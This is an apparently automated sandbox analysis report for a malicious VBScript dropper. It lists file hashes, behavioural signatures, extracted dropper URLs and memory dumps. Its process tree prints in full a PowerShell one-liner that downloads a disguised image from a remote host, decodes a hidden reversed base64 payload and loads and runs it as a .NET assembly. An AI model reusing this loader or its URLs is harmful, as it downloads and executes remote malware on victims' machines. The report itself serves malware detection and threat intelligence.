Analysis

  • max time kernel
    60s
  • max time network
    61s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-12-2024 15:03

General

  • Target

    economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.vbs

  • Size

    212KB

  • MD5

    7f54fcc18cf1595a91bcf1c61df774cf

  • SHA1

    298fae69662e298ac46e0e1be5fc679a0f527c22

  • SHA256

    891e95aa7d15515df54f91606a27711c7c6bce4be800f6317e5f58843b0ecfb7

  • SHA512

    3c368045ebe048ee7e8972e6dcaf92f60772c75a1a2d5cdaae7e6048aac8b7cb8fd266c6632b9b7ff17598162600ba517a71b4c9b90d564e0e7c4ebe193ed3ba

  • SSDEEP

    3072:A8gVmI3b0mgfmWu+le9VOv5iG5sVhQ30Wk+70wgA1A:A8gV6e9VOvM

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1924

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabA4BA.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarA4CC.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/1924-8-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-22-0x000007FEF5FCE000-0x000007FEF5FCF000-memory.dmp

    Filesize

    4KB

  • memory/1924-4-0x000007FEF5FCE000-0x000007FEF5FCF000-memory.dmp

    Filesize

    4KB

  • memory/1924-9-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-10-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-11-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-7-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

  • memory/1924-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

  • memory/1924-47-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-48-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-49-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-50-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1924-52-0x000000001AD20000-0x000000001AECA000-memory.dmp

    Filesize

    1.7MB

  • memory/1924-53-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

    Filesize

    9.6MB